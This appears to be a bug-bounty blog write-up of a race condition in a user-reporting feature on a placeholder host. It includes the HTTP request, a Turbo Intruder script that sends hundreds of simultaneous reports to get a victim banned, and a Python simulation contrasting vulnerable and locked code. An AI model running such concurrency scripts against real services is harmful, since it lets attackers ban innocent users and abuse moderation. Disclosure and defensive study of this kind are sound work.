banning users Race condition

What is a race condition?

A race condition occurs when multiple requests or processes try to access and modify the same resource at the same time, and the outcome depends on the order in which they happen to run.

Example: you are booking a train ticket online and only a single seat (assume seat no. 5) is left. You book that seat, and at the same moment someone else in a different location books the same seat. Both bookings succeed and you both end up with seat no. 5. This kind of issue is called a race condition: multiple parties access the same resource at the same time and the system fails to serialize them.

CASE STUDY

As this was a private program, all illustrations of the vulnerability use example.com as the host.

The application has a feature to report a person as inappropriate, but each account can report a given person only once.

To ban a user, at least 100 inappropriate reports must be made against the account. So I first tried bypassing the rate limit, but that failed.

POC (RACE CONDITION)

Visit the user account example.com/user/victim and click on report.

Intercept the request and send it to Turbo Intruder (a Burp plugin by @albinowax).

HTTP request

POST /user/victim HTTP/1.1
Host: example
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Referer: https://example.com
Content-Type: application/json;charset=utf-8
Authorization:
Content-Length: 22
Origin: https://example.com
Connection: keep-alive
Cookie:
{ json data }

Turbo Intruder script

def queueRequests(target, wordlists):
    # RequestEngine and table are provided by Turbo Intruder's runtime
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    # Queue 30 copies of the intercepted report request behind one gate
    for i in range(30):
        engine.queue(target.req, target.baseInput,
                     gate='race1')
    # Open the gate so all queued requests are released at the same instant
    engine.openGate('race1')
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    # Show every response in the results table
    table.add(req)

Click Attack. Once I sent this, I noticed that 20 of the requests came back with 200 OK.

So I increased the range from 30 to 300 and was able to send more than 100 report requests to the server. After 3 to 4 hours of waiting, the victim account was banned.
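The bug behind this finding is a check-then-act on "has this account already reported this user?" that is not atomic, so concurrent requests all pass the check before any of them is recorded. The following is an added example, not code from the original write-up or the affected application: a small in-memory simulation of the report endpoint with the vulnerable check-then-act beside a version where check and insert form one critical section (the in-process analogue of a database unique constraint on the (reporter, target) pair). The class and function names are hypothetical.

```python
import threading
import time


class ReportStore:
    """Records (reporter, target) reports, at most one per pair.

    atomic=False reproduces the race from the write-up: the duplicate
    check and the insert are separate steps, so requests that arrive
    together all see "not reported yet".
    atomic=True wraps both steps in one lock, the in-process analogue
    of enforcing uniqueness on (reporter, target) in the database.
    """

    def __init__(self, atomic):
        self.atomic = atomic
        self.reports = []   # accepted (reporter, target) reports
        self.seen = set()   # pairs already stored
        self.lock = threading.Lock()

    def _check_then_act(self, reporter, target):
        if (reporter, target) in self.seen:   # check ...
            return False
        time.sleep(0.01)    # constructed delay standing in for DB latency
        self.seen.add((reporter, target))     # ... then act
        self.reports.append((reporter, target))
        return True

    def report(self, reporter, target):
        if self.atomic:
            with self.lock:
                return self._check_then_act(reporter, target)
        return self._check_then_act(reporter, target)

    def count_for(self, target):
        return sum(1 for _, t in self.reports if t == target)


def race(store, reporter, target, n):
    """Release n report requests from one reporter at the same instant
    (like Turbo Intruder's gate) and return how many were accepted."""
    gate = threading.Barrier(n)

    def worker():
        gate.wait()
        store.report(reporter, target)

    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return store.count_for(target)
```

With atomic=False the same reporter lands many reports in one burst, which a per-account rate limit cannot prevent because every request is already inside the window; with atomic=True exactly one report is accepted regardless of concurrency.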

Reported –> Accepted –> P3 –> $dollar

2 replies on “banning users Race condition”

To ban any user you need to have (assume) 100 reports against the account, and all the reports should be made from different accounts, but the developer was not checking whether the reports were made from the same account or different accounts, since they had applied a rate limit and thought there was no way to bypass it.
